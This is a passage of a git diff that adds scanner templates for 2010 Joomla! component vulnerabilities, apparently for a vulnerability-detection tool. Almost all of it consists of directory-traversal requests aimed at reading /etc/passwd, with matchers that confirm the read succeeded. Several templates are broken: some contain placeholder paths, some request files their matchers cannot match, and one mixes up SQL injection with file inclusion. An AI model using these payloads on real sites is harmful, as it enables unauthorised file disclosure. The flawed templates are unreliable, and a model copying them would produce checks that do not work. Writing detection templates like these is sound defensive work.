"{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0696.yml b/cves/2010/CVE-2010-0696.yml new file mode 100644 index 0000000000..db109c5d00 --- /dev/null +++ b/cves/2010/CVE-2010-0696.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0696 + +info: + name: Joomla! Component Jw_allVideos - Arbitrary File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/11447 + - https://www.cvedetails.com/cve/CVE-2010-0696 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0759.yml b/cves/2010/CVE-2010-0759.yml new file mode 100644 index 0000000000..991d5572b1 --- /dev/null +++ b/cves/2010/CVE-2010-0759.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0759 + +info: + name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + reference: | + - https://www.exploit-db.com/exploits/11498 + - https://www.cvedetails.com/cve/CVE-2010-0759 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0942.yml b/cves/2010/CVE-2010-0942.yml new file mode 100644 index 0000000000..1470985d87 --- /dev/null +++ b/cves/2010/CVE-2010-0942.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0942 + +info: + name: Joomla! Component com_jvideodirect - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11089 + - https://www.cvedetails.com/cve/CVE-2010-0942 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0972.yml b/cves/2010/CVE-2010-0972.yml new file mode 100644 index 0000000000..4c761145f4 --- /dev/null +++ b/cves/2010/CVE-2010-0972.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0972 + +info: + name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11738 + - https://www.cvedetails.com/cve/CVE-2010-0972 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0982.yml b/cves/2010/CVE-2010-0982.yml new file mode 100644 index 0000000000..0c398588a0 --- /dev/null +++ b/cves/2010/CVE-2010-0982.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0982 + +info: + name: Joomla! Component com_cartweberp - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/10942 + - https://www.cvedetails.com/cve/CVE-2010-0982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1056.yml b/cves/2010/CVE-2010-1056.yml new file mode 100644 index 0000000000..104d6ccc3d --- /dev/null +++ b/cves/2010/CVE-2010-1056.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1056 + +info: + name: Joomla! Component com_rokdownloads - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11760 + - https://www.cvedetails.com/cve/CVE-2010-1056 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1081.yml b/cves/2010/CVE-2010-1081.yml new file mode 100644 index 0000000000..4c4670d529 --- /dev/null +++ b/cves/2010/CVE-2010-1081.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1081 + +info: + name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11511 + - https://www.cvedetails.com/cve/CVE-2010-1081 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1217.yml b/cves/2010/CVE-2010-1217.yml new file mode 100644 index 0000000000..0c3d2b0c26 --- /dev/null +++ b/cves/2010/CVE-2010-1217.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1217 + +info: + name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE: the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + reference: | + - https://www.exploit-db.com/exploits/11814 + - https://www.cvedetails.com/cve/CVE-2010-1217 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jeformcr&view={LFI}%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1302.yml b/cves/2010/CVE-2010-1302.yml new file mode 100644 index 0000000000..e3e0f264d3 --- /dev/null +++ b/cves/2010/CVE-2010-1302.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1302 + +info: + name: Joomla! Component DW Graph - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11978 + - https://www.cvedetails.com/cve/CVE-2010-1302 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dwgraphs&controller={lfi}%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1340.yml b/cves/2010/CVE-2010-1340.yml new file mode 100644 index 0000000000..16e7ca875a --- /dev/null +++ b/cves/2010/CVE-2010-1340.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1340 + +info: + name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/33797 + - https://www.cvedetails.com/cve/CVE-2010-1340 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1461.yml b/cves/2010/CVE-2010-1461.yml new file mode 100644 index 0000000000..13660c3ae8 --- /dev/null +++ b/cves/2010/CVE-2010-1461.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1461 + +info: + name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12232 + - https://www.cvedetails.com/cve/CVE-2010-1461 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1469.yml b/cves/2010/CVE-2010-1469.yml new file mode 100644 index 0000000000..d06c195c18 --- /dev/null +++ b/cves/2010/CVE-2010-1469.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1469 + +info: + name: Joomla! Component JProject Manager 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12146 + - https://www.cvedetails.com/cve/CVE-2010-1469 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1478.yml b/cves/2010/CVE-2010-1478.yml new file mode 100644 index 0000000000..850f9aa938 --- /dev/null +++ b/cves/2010/CVE-2010-1478.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1478 + +info: + name: Joomla! Component Jfeedback 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12145 + - https://www.cvedetails.com/cve/CVE-2010-1478 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1491.yml b/cves/2010/CVE-2010-1491.yml new file mode 100644 index 0000000000..d247b95fe5 --- /dev/null +++ b/cves/2010/CVE-2010-1491.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1491 + +info: + name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12318 + - https://www.cvedetails.com/cve/CVE-2010-1491 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1540.yml b/cves/2010/CVE-2010-1540.yml new file mode 100644 index 0000000000..b0afe05f6e --- /dev/null +++ b/cves/2010/CVE-2010-1540.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1540 + +info: + name: Joomla! Component com_blog - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: | + - https://www.exploit-db.com/exploits/11625 + - https://www.cvedetails.com/cve/CVE-2010-1540 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1603.yml b/cves/2010/CVE-2010-1603.yml new file mode 100644 index 0000000000..dc2b52c09b --- /dev/null +++ b/cves/2010/CVE-2010-1603.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1603 + +info: + name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12284 + - https://www.cvedetails.com/cve/CVE-2010-1603 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1653.yml b/cves/2010/CVE-2010-1653.yml new file mode 100644 index 0000000000..4313ef2ea4 --- /dev/null +++ b/cves/2010/CVE-2010-1653.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1653 + +info: + name: Joomla! Component Graphics 1.0.6 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. + reference: | + - https://www.exploit-db.com/exploits/12430 + - https://www.cvedetails.com/cve/CVE-2010-1653 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1658.yml b/cves/2010/CVE-2010-1658.yml new file mode 100644 index 0000000000..6ddb4c7fcf --- /dev/null +++ b/cves/2010/CVE-2010-1658.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1658 + +info: + name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12427 + - https://www.cvedetails.com/cve/CVE-2010-1658 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1715.yml b/cves/2010/CVE-2010-1715.yml new file mode 100644 index 0000000000..46d27a2dc0 --- /dev/null +++ b/cves/2010/CVE-2010-1715.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1715 + +info: + name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. + reference: | + - https://www.exploit-db.com/exploits/12174 + - https://www.cvedetails.com/cve/CVE-2010-1715 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1873.yml b/cves/2010/CVE-2010-1873.yml new file mode 100644 index 0000000000..8be5d8b989 --- /dev/null +++ b/cves/2010/CVE-2010-1873.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1873 + +info: + name: Joomla! Component Jvehicles - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information. + reference: | + - https://www.exploit-db.com/exploits/11997 + - https://www.cvedetails.com/cve/CVE-2010-1873 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1878.yml b/cves/2010/CVE-2010-1878.yml new file mode 100644 index 0000000000..12459b34f7 --- /dev/null +++ b/cves/2010/CVE-2010-1878.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1878 + +info: + name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12317 + - https://www.cvedetails.com/cve/CVE-2010-1878 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1957.yml b/cves/2010/CVE-2010-1957.yml new file mode 100644 index 0000000000..63a50e8224 --- /dev/null +++ b/cves/2010/CVE-2010-1957.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1957 + +info: + name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12235 + - https://www.cvedetails.com/cve/CVE-2010-1957 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1977.yml b/cves/2010/CVE-2010-1977.yml new file mode 100644 index 0000000000..71de2a9492 --- /dev/null +++ b/cves/2010/CVE-2010-1977.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1977 + +info: + name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12083 + - https://www.cvedetails.com/cve/CVE-2010-1977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1982.yml b/cves/2010/CVE-2010-1982.yml new file mode 100644 index 0000000000..1ef0e13f14 --- /dev/null +++ b/cves/2010/CVE-2010-1982.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1982 + +info: + name: Joomla! Component JA Voice 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12121 + - https://www.cvedetails.com/cve/CVE-2010-1982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2045.yml b/cves/2010/CVE-2010-2045.yml new file mode 100644 index 0000000000..886f48ac65 --- /dev/null +++ b/cves/2010/CVE-2010-2045.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2045 + +info: + name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12595 + - https://www.cvedetails.com/cve/CVE-2010-2045 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2050.yml b/cves/2010/CVE-2010-2050.yml new file mode 100644 index 0000000000..9aedcbfc20 --- /dev/null +++ b/cves/2010/CVE-2010-2050.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2050 + +info: + name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12611 + - https://www.cvedetails.com/cve/CVE-2010-2050 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2128.yml b/cves/2010/CVE-2010-2128.yml new file mode 100644 index 0000000000..cf019f95a3 --- /dev/null +++ b/cves/2010/CVE-2010-2128.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2128 + +info: + name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12607 + - https://www.cvedetails.com/cve/CVE-2010-2128 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2507.yml b/cves/2010/CVE-2010-2507.yml new file mode 100644 index 0000000000..4ff7972b09 --- /dev/null +++ b/cves/2010/CVE-2010-2507.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2507 + +info: + name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/13981 + - https://www.cvedetails.com/cve/CVE-2010-2507 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2680.yml b/cves/2010/CVE-2010-2680.yml new file mode 100644 index 0000000000..6d1b76393a --- /dev/null +++ b/cves/2010/CVE-2010-2680.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2680 + +info: + name: Joomla! Component jesectionfinder - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/14064 + - https://www.cvedetails.com/cve/CVE-2010-2680 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=[LFI]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2857.yml b/cves/2010/CVE-2010-2857.yml new file mode 100644 index 0000000000..41f3443057 --- /dev/null +++ b/cves/2010/CVE-2010-2857.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2857 + +info: + name: Joomla! Component Music Manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. + reference: | + - https://www.exploit-db.com/exploits/14274 + - https://www.cvedetails.com/cve/CVE-2010-2857 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/component/music/album.html?cid=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2918.yml b/cves/2010/CVE-2010-2918.yml new file mode 100644 index 0000000000..6585591609 --- /dev/null +++ b/cves/2010/CVE-2010-2918.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2918 + +info: + name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion + author: daffainfo + severity: high + description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + reference: | + - https://www.exploit-db.com/exploits/31708 + - https://www.cvedetails.com/cve/CVE-2010-2918 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-3203.yml b/cves/2010/CVE-2010-3203.yml new file mode 100644 index 0000000000..7f5245195e --- /dev/null +++ b/cves/2010/CVE-2010-3203.yml @@ -0,0 +1,27 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Local File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: | + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4282.yml b/cves/2010/CVE-2010-4282.yml new file mode 100644 index 0000000000..6b4f52c658 --- /dev/null +++ b/cves/2010/CVE-2010-4282.yml @@ -0,0 +1,27 @@ 